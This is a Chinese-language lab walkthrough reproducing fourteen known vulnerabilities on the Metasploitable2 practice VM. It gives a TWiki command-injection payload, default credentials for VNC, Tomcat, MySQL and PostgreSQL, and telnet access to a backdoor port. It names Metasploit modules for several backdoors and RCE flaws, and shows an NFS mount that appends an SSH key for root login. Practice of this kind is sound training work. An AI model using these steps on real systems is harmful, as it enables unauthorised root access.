linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
Metasploitable2靶机漏洞复现
1、TWiki 'rev' Parameter Arbitrary Command Execution
2、VNC Server 'password' Password
3、Ingreslock 后门漏洞
4、UnrealIRC
文章目录 Metasploitable2靶机漏洞复现 1、TWiki 'rev' Parameter Arbitrary Command Execution 2、VNC Server 'password' Password 3、Ingreslock 后门漏洞 4、UnrealIRCd Backdoor(ircd) 5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution 6、Tomcat管理台默认口令漏洞 7、MySQL弱密码登录 8、PostgreSQL弱密码登录 9、Distcc后门漏洞 10、vsftpd 2.3.4 后门漏洞 11、Druby 远程代码执行漏洞 12、Samba sysmlink 默认配置目录遍历漏洞 13、Samba MS-RPC Shell 命令注入漏洞 14、Linux NFS共享目录配置漏洞 Metasploitable2靶机漏洞复现 参考大佬: 环境:vmware虚拟机Metasploitable2环境 IP:192.168.72.130 1、TWiki ‘rev’ Parameter Arbitrary Command Execution 描述: rev参数可执行任意命令 验证: %20|pwd||echo 2、VNC Server ‘password’ Password 验证: vncviewer 192.168.72.130 Password: password 3、Ingreslock 后门漏洞 原理: Ingreslock后门程序监听1524端口linux漏洞,连接到1524端口就可以直接获取root权限。 端口: 1524 验证: telnet 192.168.72.130 1524 4、UnrealIRCd Backdoor(ircd) 端口: 6667 利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor 5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution CVE-2012-1823 利用模块: exploit/multi/http/php_cgi_arg_injection 6、Tomcat管理台默认口令漏洞 192.168.160.131:8180 tomcat/tomcat 7、MySQL弱密码登录 验证: mysql –h 192.168.160.131 –u root 8、PostgreSQL弱密码登录 postgres/postgres 9、Distcc后门漏洞 CVE-2004-2687 nmap扫描: 端口: 3632 利用模块: exploit/unix/misc/distcc_exec 10、vsftpd 2.3.4 后门漏洞 nmap扫描: 利用模块: exploit/unix/ftp/vsftpd_234_backdoor 11、Druby 远程代码执行漏洞 CVE-2013-0156(类似) 利用模块: exploit/linux/misc/drb_remote_codeexec 端口: 8787 12、Samba sysmlink 默认配置目录遍历漏洞 CVE-2010-0926 端口: 445 利用模块: auxiliary/admin/smb/samba_symlink_traversal set SMBSHARE tmp //设置SAM可写文件 在新窗口下打开上面生成的共享目录: smbclient //IP/tmp (不输入密码直接回车) cd rootfs ls 13、Samba MS-RPC Shell 命令注入漏洞 CVE-2007-2447 端口: 139 利用模块: exploit/multi/samba/usermap_script 14、Linux NFS共享目录配置漏洞 原理: NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录 输入ssh-keygen 生成RSA公钥 依次输入: (1)mount –t nfs 192.168.160.131:/ /tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下; (2)cat/root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下; (3)sshroot@192.168.72.130,实现无密码登录 (编辑:晋中站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |